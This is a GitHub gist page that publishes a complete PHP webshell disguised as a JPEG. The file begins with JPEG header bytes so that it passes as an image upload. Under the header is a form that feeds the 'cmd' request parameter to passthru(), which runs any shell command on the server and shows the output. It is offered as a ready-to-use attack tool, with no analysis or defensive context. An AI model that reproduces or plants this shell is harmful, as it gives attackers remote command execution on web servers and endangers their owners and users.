Created
March 28, 2018 10:46
-
-
Save SleepyLctl/71ace4d64d3134ea5ab5bc0a93d738b6 to your computer and use it in GitHub Desktop.
PHP Webshell with JPEG metadata
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ÿØÿà | |
<form action="" method="get"> | |
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" /> | |
</form> | |
Output:<br /> | |
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment